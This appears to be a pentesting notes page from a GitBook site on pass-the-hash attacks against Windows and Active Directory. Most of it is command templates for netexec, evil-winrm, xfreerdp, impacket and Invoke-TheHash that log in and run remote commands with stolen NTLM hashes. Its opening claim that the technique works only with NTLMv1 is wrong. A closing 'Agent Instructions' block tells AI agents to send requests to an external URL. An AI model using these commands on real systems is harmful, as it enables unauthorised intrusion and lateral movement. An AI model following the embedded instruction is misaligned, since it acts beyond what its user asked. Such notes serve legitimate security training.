# Pass The Hash Only with **NTLMv1**. It consists of passing hashes as passwords to log in, which is useful when password cracking has failed. It can be done on an Active Directory domain or on local accounts without passing the domain. Requires an SMB connection, Windows File and Printer Sharing enabled, the ADMIN$ share available (all default settings on modern Windows Server systems) and a valid credentials with local administrative permissions. This method works for Active Directory domain accounts and the built-in local administrator account. However, due to the [*2014 security update*](https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a), this technique cannot be used to authenticate as any other local admin account. {% tabs %} {% tab title="Linux" %}

Tools	Details
netexec	`nxc smb <IP> -d . -u <USER> -H <HASH> -x <COMMAND>` `nxc smb <IP> --local-auth -u <USER> -H <HASH> -x <COMMAND>`
evil-winrm	`evil-winrm -i <IP> -u <USER>[@<DOMAIN>] -H <HASH>`
xfreerdp	`xfreerdp /v:<IP> /u:<USER> /pth:<HASH> /dynamic-resolution`
impacket-smbclient	`smbclient //<IP>//<SHARE> -U <USER> --pw-nt-hash <HASH>`
impacket-psexec	`psexec -hashes <[LMHash]:NTHash> <USER>@<IP>`
impacket-wmiexec	`wmiexec -hashes <[LMHash]:NTHash> <USER>@<IP>`
smbclient	`smbclient -U <user> --pw-nt-hash //<IP>/<SHARE>` > enter the hash instead of the password

Others [**impacket-scripts**](https://www.kali.org/tools/impacket-scripts/#impacket-scripts) such as [atexec](https://github.com/fortra/impacket/blob/master/examples/atexec.py), [smbexec](https://github.com/fortra/impacket/blob/master/examples/smbexec.py). {% endtab %} {% tab title="Windows" %} ### [Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash) {% code overflow="wrap" %} ```powershell Invoke-SMBExec -Target [-Domain ] -Username -Hash -Command "" ``` {% endcode %} {% code overflow="wrap" %} ```powershell Invoke-WMIExec -Target [-Domain ] -Username -Hash -Command "" ``` {% endcode %} {% code overflow="wrap" %} ```powershell Invoke-SMBClient -Username -Hash -Source \\server\share [-Action Get|Delete] ``` {% endcode %} {% endtab %} {% endtabs %} *The user and hash we use for authentication must have administrative rights on the target computer, but if LocalAccountTokenFilterPolicy is set then only RID-500, “Administrator,” can perform remote administration tasks, if FilterAdministratorToken is also set neither can he. These settings are only for local administrative accounts.* --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/pass-the-hash.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.